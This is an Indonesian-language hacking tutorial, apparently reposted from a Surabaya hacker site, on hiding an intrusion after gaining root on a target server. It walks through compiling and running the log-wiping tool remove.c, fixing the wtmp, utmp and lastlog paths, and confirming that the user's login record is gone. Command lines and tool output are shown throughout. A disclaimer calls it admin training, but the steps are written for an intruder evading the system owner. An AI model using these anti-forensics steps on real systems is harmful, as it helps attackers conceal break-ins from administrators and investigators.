BAGAIMANA MENGHAPUS JEJAK
Pemberitahuan :1. Artikel ini dimaksudkan untuk bahan pelajaran para admin dan siapa
saja yang ingin mengembangkan pengetahuan networking/internet mereka.
2. surabayahackerlink tidak bertanggung jawab atas penyalah gunaan artikel
ini.
3. surabayahackerlink tetap menyertakan dan tidak menghapus Nama Penulis
eksploit/script dengan harapan pembaca juga tetap menyertakan kredit
untuk mereka, jangan mengganti nama2 penulis artikel/eksploit/script
dengan nama anda dengan harapan nanti dianggap hacker.
A. Apa yang harus ada
1. Server yang berhasil di root
Terserah mo pake apa, boljug pake contoh eksploit pada artikel saya
sebelumnya, pake remote eksploit juga boleh
2. Program penghapus Log
Ada banyak dan bermacam-macam program penghapus log, pilih apa yang
menurut kamu bagus dan cocok buat kamu, untuk langkah awal kamu bisa
coba gunakan remove.c dari bejat.
B. Menghapus jejak
Nah ... kamu sudah dapat akses root, asyiiik ... tapi eh nanti dulu,
gimana kalo adminnya tau?, gak ... dia gak bakalan tau, kalau kamu pake
program penghapus log untuk menghilangkan jejak kamu.
Caranya? ... download remove.c dari site surabayahackerlink (tanya mbah google jg banyak) kemudian compile
di mesin sasaran kamu, baca dulu baik2 cara compile nya di source remove.c
BTW ... remove harus di running sebagai root (untuk latihan, bisa saja
kamu login root di mesin kamu sendiri).
a. Perlu diperhatikan bagian berikut ini :
#ifdef GENERIC /* Should work with Linux, IRIX, Digital Unix, BSDs, etc */
#define WTMP "/var/adm/wtmp"
#define UTMP "/var/adm/utmp"
#define LASTLOG "/var/adm/lastlog"
#endif
Harap diingat bahwa tidak selalu file2 wtmp utmp dan lastlog berada pada
posisi yang sama, misalnya distro Slackware menaruh file2 tsb diatas di:
#define WTMP "/var/log/wtmp"
#define UTMP "/var/run/utmp"
#define LASTLOG "/var/log/lastlog"
Jadi jangan lupa cek apakah posisi file2 wtmp utmp dan lastlog sudah
sesuai dengan source remove.c
Kamu bisa gunakan perintah :
find / -name wtmp -print
find / -name utmp -print
find / -name lastlog -print
atau
whereis wtmp
whereis utmp
whereis lastlog
Kemudian ganti posisi file2 tersebut di remove.c sesuai dengan hasil
diatas.
b. Kita compile sekarang? ... ayooooooooooooo.
bejat:/home/jancok/tools# gcc remove.c -o remove -DGENERIC
remove.c: In function `main':
remove.c:50: warning: return type of `main' is not `int'
/tmp/ccZVzySI.o: In function `main':
/tmp/ccZVzySI.o(.text+0xb4): the `gets' function is dangerous and should
not be used.
Waw ... ada warning message ... gak apa2, warning bukan error
c. Cek last login nya user (jancok misalnya)
bejat:/home/jancok/tools# lastlog | grep jancok
jancok tty2 Sat Mar 11 11:32:42 -0800 2000
d. Jalankan remove
bejat:/home/jancok/tools# ./remove jancok
REMOVE by bejat
Bejat Mobile Research Centre © 1997
Found 549 record(s) for user jancok
Will attempt a lastlog cleanup by default.
# - remove last # records from utmp/wtmp
a - remove (a)ll records from utmp/wtmp
q - (q)uit program
Enter selection ->
e. Hapus record terakhir (ketik #), atau boleh juga semua (a)
Enter selection -> #
REMOVE cleaned up 0 record(s) from /var/log/wtmp
REMOVE cleaned up 0 record(s) from /var/run/utmp
REMOVE cleaned up /var/log/lastlog
f. Cek last log nya jancok
bejat:/home/jancok/tools# lastlog | grep jancok
jancok **Never logged in**
g. Ini hasilnya kalo jancok login :
Selamat datang sang pemberontak
bejat login: jancok
Password: jancokmatamupicek
sang pemberontak
No mail.
bejat:~$
h. Biasanya kalo last log nya dicatat (belum/gak dihapus) jancok bisa liat
gini, (perhatikan bagian Last login nya) :
Selamat datang sang pemberontak
bejat login: jancok
Password: jancokmatamupicek
sang pemberontak
Last login: Sat Mar 11 12:06:02 -0800 2000 on tty3.
No mail.
bejat:~$
i. Gitu aja
--
Sumber :http://www.surabayablackhat.org/
0 komentar:
Posting Komentar